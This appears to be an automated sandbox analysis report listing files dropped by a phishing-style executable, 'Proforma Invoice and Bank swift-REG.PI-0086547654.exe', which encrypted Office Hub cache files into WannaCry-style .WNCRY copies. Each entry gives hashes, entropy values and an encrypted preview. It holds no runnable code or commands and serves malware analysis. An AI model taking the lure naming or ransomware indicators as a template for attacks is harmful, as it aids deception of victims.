                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\7OUVBIZR\lockup-mslogo-color-78c06e8898[1].png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):5096
                                                          Entropy (8bit):7.964874503639336
                                                          Encrypted:false
                                                          SSDEEP:96:o6kun0+cpmgUc3ZB6W/cbeZD/Ffmbr+YqijwiCNiaunn:sZ+4Nv0bmNIdjwJNiaunn
                                                          MD5:5FE2161453DD8B23DF2D3FB705E5B802
                                                          SHA1:C968AE19E16861D7E9E0178E789A41EE6EA8F695
                                                          SHA-256:7EB90AB06A53BB715B8E8FCD24E238735B8EE940894016BD92E36425DAD467AE
                                                          SHA-512:5DF6DAFC90D4410DD22236907E81B6D0AD15A37411BDDE6FD47994E2FFA56039C43E6C995A11C176289F016739CC52223CA7832F22B835671879CA4F8EB7C3E3
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....B5....<l..@....$.7z.s.QhR..B..}.!.w3j[. ?.U.*!^.q..}D.KE)(l ....... 2..h....4.o{,X.,.A.G.8..@.7.....$.r@).....:r....I......6)N..o.....W....s........t.yWGk.o...r.n.h&..9...Za.s....|.O...nE......P.r..u....-..n...U..Y..\.n..vy.[...4...9.P.n1...T9.................B3....?.OI.'..`@..M`xUR{..KM...d...a,U..G./.......-.Q..A9......{...>... ..5h.=...+.|-5......!-.T...D..i..WC.emPGi.b8..F.+ME.\}..N..V..''....X.........I)....3.nQ....>g..iR=.a.G.,.....0P.5m....Oxv.^.....^TM...}..W.<h......;e~a}.f`....}...p.......iY6u......i..A......Vq.[.|/..Jj.2[.f6.Q.J.W.)6.,...l........c.Wz3.;N@.3...%..a4.5...4...6.VL\H.....x/...|......$.}..~....(.n.M...q.%.$..2..t.*.3._..*j....QO...l.....%t...v.$/.T.wH....5.o.)R%.{..T3Zd...^.y..._.t.......+.n.P.........k.W:$.......=1a+....f.i....ANfy....p...!...Kk...1a..N.ojC..;....{S!Y].4....I.u,...e..h......i..v@..I...{i..+...3R.`.^b.+O. .B0....H...].:Jj...}.%..........|-DS..U70...Lt...p..Ap.n.a.Bq](.3X

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\7OUVBIZR\lockup-mslogo-color-78c06e8898[1].png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):5096
                                                          Entropy (8bit):7.964874503639336
                                                          Encrypted:false
                                                          SSDEEP:96:o6kun0+cpmgUc3ZB6W/cbeZD/Ffmbr+YqijwiCNiaunn:sZ+4Nv0bmNIdjwJNiaunn
                                                          MD5:5FE2161453DD8B23DF2D3FB705E5B802
                                                          SHA1:C968AE19E16861D7E9E0178E789A41EE6EA8F695
                                                          SHA-256:7EB90AB06A53BB715B8E8FCD24E238735B8EE940894016BD92E36425DAD467AE
                                                          SHA-512:5DF6DAFC90D4410DD22236907E81B6D0AD15A37411BDDE6FD47994E2FFA56039C43E6C995A11C176289F016739CC52223CA7832F22B835671879CA4F8EB7C3E3
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....B5....<l..@....$.7z.s.QhR..B..}.!.w3j[. ?.U.*!^.q..}D.KE)(l ....... 2..h....4.o{,X.,.A.G.8..@.7.....$.r@).....:r....I......6)N..o.....W....s........t.yWGk.o...r.n.h&..9...Za.s....|.O...nE......P.r..u....-..n...U..Y..\.n..vy.[...4...9.P.n1...T9.................B3....?.OI.'..`@..M`xUR{..KM...d...a,U..G./.......-.Q..A9......{...>... ..5h.=...+.|-5......!-.T...D..i..WC.emPGi.b8..F.+ME.\}..N..V..''....X.........I)....3.nQ....>g..iR=.a.G.,.....0P.5m....Oxv.^.....^TM...}..W.<h......;e~a}.f`....}...p.......iY6u......i..A......Vq.[.|/..Jj.2[.f6.Q.J.W.)6.,...l........c.Wz3.;N@.3...%..a4.5...4...6.VL\H.....x/...|......$.}..~....(.n.M...q.%.$..2..t.*.3._..*j....QO...l.....%t...v.$/.T.wH....5.o.)R%.{..T3Zd...^.y..._.t.......+.n.P.........k.W:$.......=1a+....f.i....ANfy....p...!...Kk...1a..N.ojC..;....{S!Y].4....I.u,...e..h......i..v@..I...{i..+...3R.`.^b.+O. .B0....H...].:Jj...}.%..........|-DS..U70...Lt...p..Ap.n.a.Bq](.3X

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\7OUVBIZR\pwa-vendor-bundle-ba2888a24179bf152f3d[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):702504
                                                          Entropy (8bit):7.999722987918677
                                                          Encrypted:true
                                                          SSDEEP:12288:T2zxk4xnOdDOQXFVXzZ22XsLnuFagyH52t7FZnNJGizw5UZIotBvhm:T2zLnOd6QXTXd22LYvHAfd85UZIwZm
                                                          MD5:B3CAFDC5A323DB9A787526E0C03F0CA1
                                                          SHA1:97A89B0700E46ABE5396422974A6EE29BE51E380
                                                          SHA-256:9F5379F01EE711CF441DB2C7B33B5D193D614EC4445A58FF01945D4697C057DA
                                                          SHA-512:72A5588E8DA046E7FFE56218F4BA85D544D44A58F9E756389CDBA1206EF8097C4BD6927BF68FFEF5886A7FA7490DEDDE56AE006B54DCC2D5577F0BD09D2477EB
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....BV0.....>..1..FQ.Z.j...L.{..:.......B.P.g.~.0....5.O....l..........c.zb..E...c..4..6...R.tdo.u<.K.M...#Kl...ys3.F/.r.{Q....Ry..:...........:..X.8.>p*...[..Z.M..P..x.._m.\...S..k8.....9..^%..w.........YF.W..4b...w.....vn6'..F.Wg.LK...;...O.................h..Xj$3'H.h............%4..*].d.}.........$+....y..}.h-.H.....Gu..s...<...G...8....I._..){ci..B]f=..Q.L.9.9..........?....:...:B.Zl.....zL>.Qo6~?Tg]..F..d..%.r...Hk.....5....vS!..3..G*...@...-..N....&.Fp..,...".w?.NA....@P]a.....b...x../.A..+NAd.V.qLHm.o.t......z....m\o.'...H.t.HT.$8...C..B..Rx......j(...:`2..|...'N$]4.Nu...9.s........L.sV.^K4..G..P.K........~.d..Ym.&..\..A.}.S.r.....jJ.C.C..M.lp.,...6.3.n}.3.M.(..\.t......-......Lr./..a@...)D*..B)......ut....w..*...86=u`.."..w.......5D.f...Om..{.u..U.s..{....H..&....=.[o.A"..(...H.....Y.B..(.Y?...g..V.6..q...H.......K(...THu.SC.!..L..:.l".....h.2.l.zl.T.{...}.O//){...1....&.....[.`.s..J&.....bV..P.....d..K.%....zF.{...

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\7OUVBIZR\pwa-vendor-bundle-ba2888a24179bf152f3d[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):702504
                                                          Entropy (8bit):7.999722987918677
                                                          Encrypted:true
                                                          SSDEEP:12288:T2zxk4xnOdDOQXFVXzZ22XsLnuFagyH52t7FZnNJGizw5UZIotBvhm:T2zLnOd6QXTXd22LYvHAfd85UZIwZm
                                                          MD5:B3CAFDC5A323DB9A787526E0C03F0CA1
                                                          SHA1:97A89B0700E46ABE5396422974A6EE29BE51E380
                                                          SHA-256:9F5379F01EE711CF441DB2C7B33B5D193D614EC4445A58FF01945D4697C057DA
                                                          SHA-512:72A5588E8DA046E7FFE56218F4BA85D544D44A58F9E756389CDBA1206EF8097C4BD6927BF68FFEF5886A7FA7490DEDDE56AE006B54DCC2D5577F0BD09D2477EB
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....BV0.....>..1..FQ.Z.j...L.{..:.......B.P.g.~.0....5.O....l..........c.zb..E...c..4..6...R.tdo.u<.K.M...#Kl...ys3.F/.r.{Q....Ry..:...........:..X.8.>p*...[..Z.M..P..x.._m.\...S..k8.....9..^%..w.........YF.W..4b...w.....vn6'..F.Wg.LK...;...O.................h..Xj$3'H.h............%4..*].d.}.........$+....y..}.h-.H.....Gu..s...<...G...8....I._..){ci..B]f=..Q.L.9.9..........?....:...:B.Zl.....zL>.Qo6~?Tg]..F..d..%.r...Hk.....5....vS!..3..G*...@...-..N....&.Fp..,...".w?.NA....@P]a.....b...x../.A..+NAd.V.qLHm.o.t......z....m\o.'...H.t.HT.$8...C..B..Rx......j(...:`2..|...'N$]4.Nu...9.s........L.sV.^K4..G..P.K........~.d..Ym.&..\..A.}.S.r.....jJ.C.C..M.lp.,...6.3.n}.3.M.(..\.t......-......Lr./..a@...)D*..B)......ut....w..*...86=u`.."..w.......5D.f...Om..{.u..U.s..{....H..&....=.[o.A"..(...H.....Y.B..(.Y?...g..V.6..q...H.......K(...THu.SC.!..L..:.l".....h.2.l.zl.T.{...}.O//){...1....&.....[.`.s..J&.....bV..P.....d..K.%....zF.{...

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\OB7JJZIK\otel-logger-104bffe9378b8041455c[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):97816
                                                          Entropy (8bit):7.9982805141954705
                                                          Encrypted:true
                                                          SSDEEP:1536:yeMaOGCNN8/aF09N4y6YOx/Bsv/rkHUnJqIUjkRWtip3Vm1lkmJaTSpcszILdytS:LXCNNy9Sy6YOxp+wH2JYEp34lkV2pc9P
                                                          MD5:9B316FE1A57B50A3A1E15A805BF4581E
                                                          SHA1:28B80480F837D59668BCE1AF760207C6A04B3C01
                                                          SHA-256:CB7855D3D50ABDBA2FA83869B60757090D92FB4F473FC19DF8E07B53F24328E7
                                                          SHA-512:9F2795B2B365147CEDAFBFA5687475AE19DC63C90FC98A6DF87DE3F236FE12D4D8BBF3064F783C0979B7103DA43780E6A0B9C9BA97E33673220FC3A8D0B52954
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....OW..2.,#.E.L.V..YZ..U.T.......e.4L.9~D.9J..;...'.>N.......I..->3.3...9..G3.hL]Y.z..Y...%..v.#..]...v..}.....S.l..-(^....o...y...hI\x....l....)&.R+.&.E.;..Gd..R...{.Su_...4tn....2..V.\:.....4....e_...F.T...nF./...+c.n@q4.&e.Gea......k3.A.. $.FL)...d.H.....|......Cmm..~..Z.d.D.D....d.H.......w.r ....d..*K.A..._...<Kc.]m.g.....<........8..&..<...(..A.}........aM.zS.*.`C........8].p.KJF.../.=.-.......a.:..DC._3.I..A.]..k..."fL+.a...-.m..zC....=Z5...j...).9....6..]...~4..-'....91=.............K...x{...(.vO..........e`.@.f..........M.l.}..&=..~U.-....+.{.H.H%..S...d...._...:.......G.o;s.....T....'.%.4......3u8....*T.......Ye.....6..>`.`..].~......-.._.h.]..M{.""..~.!S...8.. ...WDA..\......||U..j.....}.v.s.Ep)...>y.|.....X..2g... e.d..q`X..G....).......!.aP..Al....%.saC..l..... .r..z..y..}..N.f..1.'^.b...EDi..vT....BX45.#.|....=g...yK.5T&..d~.[....@../G.T...+.s...f7....&D........cN..!atb....@^aM..J.W.X7t+.X...nM.W...j%N"...I..Z8y....

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\OB7JJZIK\otel-logger-104bffe9378b8041455c[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):97816
                                                          Entropy (8bit):7.9982805141954705
                                                          Encrypted:true
                                                          SSDEEP:1536:yeMaOGCNN8/aF09N4y6YOx/Bsv/rkHUnJqIUjkRWtip3Vm1lkmJaTSpcszILdytS:LXCNNy9Sy6YOxp+wH2JYEp34lkV2pc9P
                                                          MD5:9B316FE1A57B50A3A1E15A805BF4581E
                                                          SHA1:28B80480F837D59668BCE1AF760207C6A04B3C01
                                                          SHA-256:CB7855D3D50ABDBA2FA83869B60757090D92FB4F473FC19DF8E07B53F24328E7
                                                          SHA-512:9F2795B2B365147CEDAFBFA5687475AE19DC63C90FC98A6DF87DE3F236FE12D4D8BBF3064F783C0979B7103DA43780E6A0B9C9BA97E33673220FC3A8D0B52954
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....OW..2.,#.E.L.V..YZ..U.T.......e.4L.9~D.9J..;...'.>N.......I..->3.3...9..G3.hL]Y.z..Y...%..v.#..]...v..}.....S.l..-(^....o...y...hI\x....l....)&.R+.&.E.;..Gd..R...{.Su_...4tn....2..V.\:.....4....e_...F.T...nF./...+c.n@q4.&e.Gea......k3.A.. $.FL)...d.H.....|......Cmm..~..Z.d.D.D....d.H.......w.r ....d..*K.A..._...<Kc.]m.g.....<........8..&..<...(..A.}........aM.zS.*.`C........8].p.KJF.../.=.-.......a.:..DC._3.I..A.]..k..."fL+.a...-.m..zC....=Z5...j...).9....6..]...~4..-'....91=.............K...x{...(.vO..........e`.@.f..........M.l.}..&=..~U.-....+.{.H.H%..S...d...._...:.......G.o;s.....T....'.%.4......3u8....*T.......Ye.....6..>`.`..].~......-.._.h.]..M{.""..~.!S...8.. ...WDA..\......||U..j.....}.v.s.Ep)...>y.|.....X..2g... e.d..q`X..G....).......!.aP..Al....%.saC..l..... .r..z..y..}..N.f..1.'^.b...EDi..vT....BX45.#.|....=g...yK.5T&..d~.[....@../G.T...+.s...f7....&D........cN..!atb....@^aM..J.W.X7t+.X...nM.W...j%N"...I..Z8y....

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\OB7JJZIK\pwa-bundle-3a99f64809c6780df035[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1212760
                                                          Entropy (8bit):7.999849001794366
                                                          Encrypted:true
                                                          SSDEEP:24576:jjq+YbqWjBxVlfKc6xLvq2d8gFM0Vi9tNNQLjikOBCo9s7M6DtiEAVlI8H/5:jjwjBxVlr6xLv9m79T4ji79+M6DtihIo
                                                          MD5:53A4EAA4397790385B000AE3B4C0CB8D
                                                          SHA1:A00F3E2A9B3B682E96E3D1A9EACDFD1E472F0BFF
                                                          SHA-256:1E91D6B8AC55A2EBF0E034558043E7B4A3A2CB3D3C3C428D06AB5B2A83A52F59
                                                          SHA-512:5C73ABEA2B42DFDD5490E803721E0EB56F8F2253EC24F3711691C616F17034FBEBA26F19419C35B1DEE4AA2B6BBED97613852A71CE95FA0DEB0C3D23CFBF32A4
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....)....b4&D....x~..0.;..P]...M....I../.....B..<.......z..-..D#.w5.q...-.i.9..B..#.;....o..0........}..s...nY.6..@E2.....\..?..@ .JT..b..U...e..._.ZP..$...a.R.w.."....wi..`R..sm......?1t.f).....^L..@...e../.. ...&.e..X5.I-]...1...M..W._.........;..........kG.{.~78.n^..3.......qbq.J.Vv....\.s..C.........p.r`.7....@i.c!q..z..8..e.....Q,.J...'.p...s.|.^V3..G.>.7....Z@Oq..#...#Y....`.z.c..q.....Y.#Nt.t.[)..?..V..~#...].)...g.........C.l.@........>;k)d.zZ_.x.....gy.SM..?.Q..&!O......di._l..S.cM....:.c..^K.5.T]....g._...^U....:.me.".y.....C.A.F....|.38........F\.K........$-8.Q.QV)..:.b..v.a.pu.^. 8.;.p.Pd...J..W..T..Y..7n....M....x.!.(...}....Uwv................G}l.j1E.>.....RJP...:Z'.f...{.....J.E...u.&......?..0.s.m....."C'R{.dw.C[(.b`...v.1'}-8..r.g&....PW...O.I.....,...&....Tw..o..}4.A..p...Q%..j...7T.u|.*I.....!%......d.d.*&kZ#.@et....."......}e7.80z;.I..8.;...}Q.]..MiK..:.R5...J6.... w....h.Y>.m.k#.....G..2..rY.3.g...&^...a_..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\OB7JJZIK\pwa-bundle-3a99f64809c6780df035[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1212760
                                                          Entropy (8bit):7.999849001794366
                                                          Encrypted:true
                                                          SSDEEP:24576:jjq+YbqWjBxVlfKc6xLvq2d8gFM0Vi9tNNQLjikOBCo9s7M6DtiEAVlI8H/5:jjwjBxVlr6xLv9m79T4ji79+M6DtihIo
                                                          MD5:53A4EAA4397790385B000AE3B4C0CB8D
                                                          SHA1:A00F3E2A9B3B682E96E3D1A9EACDFD1E472F0BFF
                                                          SHA-256:1E91D6B8AC55A2EBF0E034558043E7B4A3A2CB3D3C3C428D06AB5B2A83A52F59
                                                          SHA-512:5C73ABEA2B42DFDD5490E803721E0EB56F8F2253EC24F3711691C616F17034FBEBA26F19419C35B1DEE4AA2B6BBED97613852A71CE95FA0DEB0C3D23CFBF32A4
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....)....b4&D....x~..0.;..P]...M....I../.....B..<.......z..-..D#.w5.q...-.i.9..B..#.;....o..0........}..s...nY.6..@E2.....\..?..@ .JT..b..U...e..._.ZP..$...a.R.w.."....wi..`R..sm......?1t.f).....^L..@...e../.. ...&.e..X5.I-]...1...M..W._.........;..........kG.{.~78.n^..3.......qbq.J.Vv....\.s..C.........p.r`.7....@i.c!q..z..8..e.....Q,.J...'.p...s.|.^V3..G.>.7....Z@Oq..#...#Y....`.z.c..q.....Y.#Nt.t.[)..?..V..~#...].)...g.........C.l.@........>;k)d.zZ_.x.....gy.SM..?.Q..&!O......di._l..S.cM....:.c..^K.5.T]....g._...^U....:.me.".y.....C.A.F....|.38........F\.K........$-8.Q.QV)..:.b..v.a.pu.^. 8.;.p.Pd...J..W..T..Y..7n....M....x.!.(...}....Uwv................G}l.j1E.>.....RJP...:Z'.f...{.....J.E...u.&......?..0.s.m....."C'R{.dw.C[(.b`...v.1'}-8..r.g&....PW...O.I.....,...&....Tw..o..}4.A..p...Q%..j...7T.u|.*I.....!%......d.d.*&kZ#.@et....."......}e7.80z;.I..8.;...}Q.]..MiK..:.R5...J6.... w....h.Y>.m.k#.....G..2..rY.3.g...&^...a_..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\OB7JJZIK\pwa-forms-group~mru~officeforms-group-forms~officeforms-my-forms~places.bcdc404c7fe22f14ccad.chunk.v7[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):46296
                                                          Entropy (8bit):7.995927961587632
                                                          Encrypted:true
                                                          SSDEEP:768:Bn5F1fGhfMQOKTiGID21g+pWd60QmeGd1WeAaRiSzEYfemDN:jbO/dGFS1nD0JcjSzEYfemN
                                                          MD5:C3C7E990C63E2DABA6805FE37AAEC013
                                                          SHA1:9AAB1EBAAB25F1CD8BCB21B65345440C1A2C6EB2
                                                          SHA-256:705D27AF1EEF3C0737DFB827BA79FB0FCA63FCE5B4229234C92A90706A20E8F5
                                                          SHA-512:09C38799B9FDA74BCD1C915F6B9A590D9F35C0C107A6A54271AAE03821318AE51AEF5547EEA2676B283305A5D58CCDEA9B3C144F02E87CBBBE2EE3F4427491DA
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!........9.k.K\zF.6..ng......G....=..+...9...f.#.*U8....X.I...x.!.<....k...Xb.R-..$.j...Q...&oR...C...!5.6.j..\..(..:..NwdI...~.T.....k.|.....#..@;oQ...U(.8..`J.e.n.-.E..-....:(.3.m....p2R...Y.....D.....Z._%....(KA.X..~C.EjM.#.$O.W.._....)ue....$.W.............j$.dQ.G.(.?d..d.~.'._.3....`......+Ga........?...K.K...y....RML.?-v..W....>@..&N.<...>.o..S...{|}L.p$..m......B.:.D.. Z..j..vza|...j.U..T.mG....K.....}.On..R.^.'.d..y/..8..... R....M....$D.Di.u.}T.,<...v.bm....C..&.3.V...ID.....G.?.l..D:....0....J..];...:..h`.l{>j1...A....!d.[.?.J..1.. "..Q)L...x....oq........`..Bd....5..:7.X./#..`.......B["v...`...v[.^.Wt\.......c.5...[V..*.Vj}..IF.>T.DG.pa,-..A.;~...0......s.....Y., ..........$h...J...}..N..;..[..1.L.Ps#.5.bQ..p.Q?.o....B&qE..f..C.: .9}C....|.'....C.#...Xe_.......W..4.9..U.,.t$..d6..!RT..#..q.o f4.P.Z'.2|$...k}.StB..X.p...p9..Q.IW.1(=5......'.k...........|s..7>..M3..=pJg[.....q...XA.t.....(..P..L...M...8}8p.....}.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\OB7JJZIK\pwa-forms-group~mru~officeforms-group-forms~officeforms-my-forms~places.bcdc404c7fe22f14ccad.chunk.v7[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):46296
                                                          Entropy (8bit):7.995927961587632
                                                          Encrypted:true
                                                          SSDEEP:768:Bn5F1fGhfMQOKTiGID21g+pWd60QmeGd1WeAaRiSzEYfemDN:jbO/dGFS1nD0JcjSzEYfemN
                                                          MD5:C3C7E990C63E2DABA6805FE37AAEC013
                                                          SHA1:9AAB1EBAAB25F1CD8BCB21B65345440C1A2C6EB2
                                                          SHA-256:705D27AF1EEF3C0737DFB827BA79FB0FCA63FCE5B4229234C92A90706A20E8F5
                                                          SHA-512:09C38799B9FDA74BCD1C915F6B9A590D9F35C0C107A6A54271AAE03821318AE51AEF5547EEA2676B283305A5D58CCDEA9B3C144F02E87CBBBE2EE3F4427491DA
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!........9.k.K\zF.6..ng......G....=..+...9...f.#.*U8....X.I...x.!.<....k...Xb.R-..$.j...Q...&oR...C...!5.6.j..\..(..:..NwdI...~.T.....k.|.....#..@;oQ...U(.8..`J.e.n.-.E..-....:(.3.m....p2R...Y.....D.....Z._%....(KA.X..~C.EjM.#.$O.W.._....)ue....$.W.............j$.dQ.G.(.?d..d.~.'._.3....`......+Ga........?...K.K...y....RML.?-v..W....>@..&N.<...>.o..S...{|}L.p$..m......B.:.D.. Z..j..vza|...j.U..T.mG....K.....}.On..R.^.'.d..y/..8..... R....M....$D.Di.u.}T.,<...v.bm....C..&.3.V...ID.....G.?.l..D:....0....J..];...:..h`.l{>j1...A....!d.[.?.J..1.. "..Q)L...x....oq........`..Bd....5..:7.X./#..`.......B["v...`...v[.^.Wt\.......c.5...[V..*.Vj}..IF.>T.DG.pa,-..A.;~...0......s.....Y., ..........$h...J...}..N..;..[..1.L.Ps#.5.bQ..p.Q?.o....B&qE..f..C.: .9}C....|.'....C.#...Xe_.......W..4.9..U.,.t$..d6..!RT..#..q.o f4.P.Z'.2|$...k}.StB..X.p...p9..Q.IW.1(=5......'.k...........|s..7>..M3..=pJg[.....q...XA.t.....(..P..L...M...8}8p.....}.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\OB7JJZIK\sharedscripts-939520eada[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):53480
                                                          Entropy (8bit):7.996660161739034
                                                          Encrypted:true
                                                          SSDEEP:1536:FQJewMCrvLcnzDkQgG7E+suN1qxcaNVNk0hJd9Py:C3MCrzczDkQLj1qxdr9Py
                                                          MD5:27B0F0B716D2D10C75B966FCBA68361C
                                                          SHA1:43C0177B47BBEF06003B5365CE790D4885875B2B
                                                          SHA-256:4E6A332EB0003BE9312B246044F195598673EC4CED91CB71C0E820ADD08890F7
                                                          SHA-512:1E91EADA19521E2F3B8AE8272102927B71F15BD599DADC11BC03886BF8558F6034B9A53B79172EB1ADBF952BC975FA95E2A6D11D7A178D8959CACD15E0A66B89
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....g.. .SM..-.T...!...Cy.8?..'..7.1.>...~.]....Z...B.9~.....mev...O.... d.D....0.d......F..5..}.&3....Z.Nb...g..|[..4..OO....Q..s5......`%..z'..2..u..{>..6......e....t.|....3h....#.....;........N.[.....6.~1;..]L...w.......G.?...9I.....b$..51...................f..X...u.G,>. .*~.0...|Zt.}...#%x. .r...&>z.K...!o1....I..k...E..]...5.XD.;...._.].....R.V......._$y.\...H....kw0xK.JTx.n.l.W.f.(.Jkjj^K.:@.Q...s....hQz3.|..-...<..p.zQ..)...E..J...........7=....x8...5..)......!.ww.=Br0..._.....1.U3.^...1 .9].9.dD.B\.F..c..W...q.#..>{.........&...xz..Ta...!....'..........g.......X..bsC...8.H*..S.......-.ZK5@.Q[.0b..Z.60.R.....$.....@.%.l....<.1v.=.4.e-.7..6.JZ.vB:.h._3..e,..O.%.*.N$U...5..L]..y.v.huF....{.w+Pq.+YlZ)y'.....:..W...-.c......P..Z.X.D6A........%.X@w.^Q....~w.E........)...=R.......F.e..._...\z......v...?..V.Z..../..v...r..v`.6.]y...z..qO.p(.X..+OH.?....-....J..O-...B3+..K~4.m=W....d..^...F...&@[..P3..7.O..G..$..8.g...l.1...

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\OB7JJZIK\sharedscripts-939520eada[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):53480
                                                          Entropy (8bit):7.996660161739034
                                                          Encrypted:true
                                                          SSDEEP:1536:FQJewMCrvLcnzDkQgG7E+suN1qxcaNVNk0hJd9Py:C3MCrzczDkQLj1qxdr9Py
                                                          MD5:27B0F0B716D2D10C75B966FCBA68361C
                                                          SHA1:43C0177B47BBEF06003B5365CE790D4885875B2B
                                                          SHA-256:4E6A332EB0003BE9312B246044F195598673EC4CED91CB71C0E820ADD08890F7
                                                          SHA-512:1E91EADA19521E2F3B8AE8272102927B71F15BD599DADC11BC03886BF8558F6034B9A53B79172EB1ADBF952BC975FA95E2A6D11D7A178D8959CACD15E0A66B89
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....g.. .SM..-.T...!...Cy.8?..'..7.1.>...~.]....Z...B.9~.....mev...O.... d.D....0.d......F..5..}.&3....Z.Nb...g..|[..4..OO....Q..s5......`%..z'..2..u..{>..6......e....t.|....3h....#.....;........N.[.....6.~1;..]L...w.......G.?...9I.....b$..51...................f..X...u.G,>. .*~.0...|Zt.}...#%x. .r...&>z.K...!o1....I..k...E..]...5.XD.;...._.].....R.V......._$y.\...H....kw0xK.JTx.n.l.W.f.(.Jkjj^K.:@.Q...s....hQz3.|..-...<..p.zQ..)...E..J...........7=....x8...5..)......!.ww.=Br0..._.....1.U3.^...1 .9].9.dD.B\.F..c..W...q.#..>{.........&...xz..Ta...!....'..........g.......X..bsC...8.H*..S.......-.ZK5@.Q[.0b..Z.60.R.....$.....@.%.l....<.1v.=.4.e-.7..6.JZ.vB:.h._3..e,..O.%.*.N$U...5..L]..y.v.huF....{.w+Pq.+YlZ)y'.....:..W...-.c......P..Z.X.D6A........%.X@w.^Q....~w.E........)...=R.......F.e..._...\z......v...?..V.Z..../..v...r..v`.6.]y...z..qO.p(.X..+OH.?....-....J..O-...B3+..K~4.m=W....d..^...F...&@[..P3..7.O..G..$..8.g...l.1...

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\OB7JJZIK\staticpwascripts-30998bff8f[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):18856
                                                          Entropy (8bit):7.989446892853039
                                                          Encrypted:false
                                                          SSDEEP:384:1nBg3oK9blansjds6qxokJxSQlcfiavaowX/nuEeY6F3qw:1BXK/akdrqF0Qqwou/nuZY6F3qw
                                                          MD5:1615A7F30CA985553A1129F5EF6145F2
                                                          SHA1:41D22E9B154818E152F555BB64A6B1E7D6DA608A
                                                          SHA-256:0DA7A0DDF1E562D28E3882149E65D42FEF118B08D231F6AD62BEFEDF2A05747B
                                                          SHA-512:A9AE21958C86648F3512DC9B867D717AFD411C54916FDA2043431A4FAA93C36DA6B726D0E36419FBCE90416B280A8C0E6B90ED75A01B86D3C7A54EE507AC1277
                                                          Malicious:false
                                                          Reputation:unknown
